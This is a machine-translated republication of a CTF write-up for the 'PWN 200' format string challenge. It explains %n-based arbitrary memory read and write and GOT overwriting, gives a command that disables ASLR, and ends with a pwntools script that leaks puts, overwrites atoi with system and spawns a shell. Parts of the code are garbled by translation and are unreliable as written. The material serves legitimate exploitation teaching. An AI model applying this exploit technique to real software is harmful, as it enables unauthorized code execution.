Shulou(Shulou.com)05/31 Report--

PWN 200formatted string vulnerability example analysis, I believe that many inexperienced people do not know what to do, so this article summarizes the causes of the problem and solutions, through this article I hope you can solve this problem.

The principle of formatting string vulnerability

In pwn, the visible form such as the following code is the format string vulnerability.

Char str [100]; scarf ("% s", str); printf (str)

Maybe the purpose of the user is to output the string directly, but the string comes from a controllable input, which creates a loophole.

The sample program is as follows

Compile: gcc-M32-o str str.c enter% 2$ x

The reason is that if you directly printf ("placeholder"), the offset on the stack will be output as data. By constructing a format string, arbitrary address reading and arbitrary address writing can be realized.

Read at any address

In fact, when we enter a string in scanf (or read), the string is already on the stack. As shown in the figure, you can see that the offset is 6. If we construct addr (4 bytes)% 6$ s, we can read the value of this address.

Let's try, type AAAA%6$ s, of course, it's impossible to actually read the memory value with the address 41414141, but from the box below I know that if we enter a legal value, we can read it.

Write at any address

It is the same as any address above, but takes advantage of a relatively unpopular feature of the formatted string,% n.

This placeholder can write the number of characters output before it to the specified address.

such as

Printf ("abc%n", & val)

The value of val is changed to 3. We usually use the fmt_str that comes with pwntools to generate the format string.

Fmt_str (offset,size,addr,target)

Offset indicates the initial offset of the address to be overwritten

Size indicates the machine word length

Addr indicates the address to be overwritten

Target indicates the value of the destination variable we want to override for

Open the IDA link to follow the debugging.

Shaped like

Char buf [100] scanf ("% s", buf); printf (buf)

Found a format string vulnerability

Exploit vulnerability checksec to view protection

Tips1 View Native ASLR

So address change. Make sure the machine is enabled. Aslr is closed. ASLRecho 0 > / proc/sys/kernel/randomize_va_space is confirmed to be closed.

Use ideas printf (& buf); puts ("GET YOUR AGE:\ n"); read (0, & buf, 0x40u); if (atoi (& buf) > 60) puts ("OLD MEN!\ n")

After seeing printf (& buf), read (buf) atoi (buf), our idea is: take advantage of the format string vulnerability to read any address, and first leak the address puts_addr of the puts function. Take advantage of the arbitrary address writing of the format string vulnerability to change the address of the atoi function in the got.plt table to the address of the system function, and then control buf through read, pass in "/ bin/sh", construct system ("bin/sh"), and get shell. About overwriting the got table, if you don't know why, refer to the following article. Https://www.jianshu.com/p/0ac63c3744ddhttp://rickgray.me/use-gdb-to-study-got-and-plt

Leak gives the address of the puts function

Any address read: https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit.html debug finds the location of the address of puts in the stack.

Debugging in gdb (here I use the gef plug-in), you can see that the address is in 7 parameters (carefully analyze AAAA%7$ x, replace AAAA is the address, change% x to% s and print out the content)

Calculate the system address

Libc.symbols ['system']-libc.symbols [' puts'] + U32 (puts_addr)

Override the content of atoi in the got table as system address

Principle printf ("abc%nabc\ n", & val); printf ("val =% d\ n", val)

Output as

Abcabcval = 3

This tells us that% n can write the number of characters output in front of it to the address pointed to by & val. If you don't understand it, you can refer to: https://ctf-wiki.github.io/ctf-wiki/pwn/fmtstr/fmtstr_exploit.html

Http://www.cnblogs.com/Ox9A82/p/5429099.html

We have debugged "AAAA" in the seventh parameter before, so we just need to construct {addr} {appropriate write value} {% 7$ n}.

Here pwntools provides the fmtstr_payload function to automatically generate the format string. Fmtstr_payload (parameter offset, {xxx_got_addr: system_addr})

Getshellexp# coding:utf-8from pwn import * elf = ELF ('pwne') # conn=remote (' ip' Port) libc=ELF ('/ lib/i386-linux-gnu/libc.so.6') # libc=ELF ('libc.so.6') p = process ('. / pwne') p.recvuntil ('[Ybig N]\ n') p.sendline ('Y') p.recvuntil ('NAME:\ n\ n') p.sendline (p32 (elf.got ['puts']) +'% 7$ s') p.recvuntil ('WELCOME\ n') puts_addr=p.recv () [4: 8] # print U32 (put_addr) system_addr = libc.symbols ['system']-libc.symbols [' puts'] + U32 (puts_addr) atoi_got_addr = elf.got ['atoi'] p.sendline (' 17') p.recvuntil ('[YampN]\ n') p.sendline ('Y') p.recvuntil ('NAME:\ n\ n') p.sendline (fmtstr_payload (7) {atoi_got_addr: system_addr}) p.recvuntil ('GET YOUR AGE:\ n\ n') p.sendline (' / bin/sh\ x00') p.interactive ()

In CTF, it is common to use any address of a format string vulnerability to read the got table address of a function, and then calculate the address of system.

Then overwrite the got table through the function of writing at any address, thus calling system ('bin/sh') to getshell.

After reading the above, have you mastered the method of sample analysis of PWN 200formatted string vulnerabilities? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.